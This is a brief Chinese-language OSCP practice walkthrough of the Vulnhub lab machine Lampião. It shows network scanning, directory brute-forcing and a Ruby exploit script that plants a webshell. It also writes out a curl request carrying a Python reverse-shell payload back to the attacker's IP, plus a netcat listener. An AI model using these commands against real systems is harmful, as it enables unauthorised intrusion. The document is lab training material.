OSCP备考_0x12_Vulnhub靶机_Lampião: 1
| 名称 | 说明 |
|---|---|
| 靶机下载链接 | https://www.vulnhub.com/entry/lampiao-1,249/ |
| 攻击机(kali) | ip:192.168.233.168 |
| 靶机(CentOS) | ip:192.168.233.136 |
arp-scan 192.168.233.1/24

nmap -p- 192.168.233.136

nmap -p22,80,1898 -A -T4 192.168.233.136

直接爆破80端口 直接timeout

那测试看看18978端口,查询的时后最好加后缀查询-x
gobuster dir -u http://192.168.233.136:1898 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt



直接使用rb脚本进行webshell
ruby 44449.rb http://192.168.233.136:1898/

这里既然可以用访问的方式让shell反弹给自己
curl 'http://192.168.233.136:1898/shell.php' -d "c=python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"192.168.233.168\",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty;pty.spawn(\"/bin/bash\")'"

nc -lvnp 3333

接下来查看有没有可以做提权的操作获取root权限



cat flag.txt






